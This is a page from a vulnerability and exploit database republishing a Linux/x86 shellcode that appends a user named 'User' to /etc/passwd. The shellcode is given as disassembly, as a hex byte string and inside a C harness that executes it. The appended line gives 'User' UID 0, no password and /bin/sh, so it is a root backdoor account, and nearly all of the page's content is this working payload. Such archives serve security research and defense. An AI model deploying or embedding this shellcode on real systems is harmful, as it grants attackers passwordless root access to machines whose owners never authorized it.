Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Linux/x86 - adduser (User) to /etc/passwd Shellcode (74 bytes)

🗓️ 16 Oct 2019 00:00:00Reported by bolonoboloType 
zdt
 zdt🔗 0day.today👁 113 Views

Linux/x86 - adduser to /etc/passwd ShellCode (74 bytes) for Linux x8

Code
# Exploit Title: Linux/x86 - adduser 'User' to /etc/passwd ShellCode (74 bytes)
# Author: bolonobolo
# Vendor Homepage: None
# Software Link: None
# Tested on: Linux x86
# Comments: add user "User" to /etc/passwd
# CVE: N/A

/*
00000000  31DB              xor ebx,ebx
00000002  31C9              xor ecx,ecx
00000004  66B90104          mov cx,0x401
00000008  F7E3              mul ebx
0000000A  53                push ebx
0000000B  6873737764        push dword 0x64777373
00000010  68632F7061        push dword 0x61702f63
00000015  682F2F6574        push dword 0x74652f2f
0000001A  8D1C24            lea ebx,[esp]
0000001D  B005              mov al,0x5
0000001F  CD80              int 0x80
00000021  93                xchg eax,ebx
00000022  F7E2              mul edx
00000024  686E2F7368        push dword 0x68732f6e
00000029  683A2F6269        push dword 0x69622f3a
0000002E  68303A3A2F        push dword 0x2f3a3a30
00000033  683A3A303A        push dword 0x3a303a3a
00000038  6855736572        push dword 0x72657355
0000003D  8D0C24            lea ecx,[esp]
00000040  B214              mov dl,0x14
00000042  B004              mov al,0x4
00000044  CD80              int 0x80
00000046  2C13              sub al,0x13
00000048  CD80              int 0x80



*/

#include<stdio.h>
#include<string.h>

unsigned char code[] = \
"\x31\xdb\x31\xc9\x66\xb9\x01\x04\xf7\xe3\x53"
"\x68\x73\x73\x77\x64\x68\x63\x2f\x70\x61\x68"
"\x2f\x2f\x65\x74\x8d\x1c\x24\xb0\x05\xcd\x80"
"\x93\xf7\xe2\x68\x6e\x2f\x73\x68\x68\x3a\x2f"
"\x62\x69\x68\x30\x3a\x3a\x2f\x68\x3a\x3a\x30"
"\x3a\x68\x55\x73\x65\x72\x8d\x0c\x24\xb2\x14"
"\xb0\x04\xcd\x80\x2c\x13\xcd\x80";

void main()
{

	printf("Shellcode Length:  %d\n", strlen(code));

	int (*ret)() = (int(*)())code;

	ret();

}

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
16 Oct 2019 00:00Current
7.4High risk
Vulners AI Score7.4
adduseretc/passwdshellcodelinux x86
113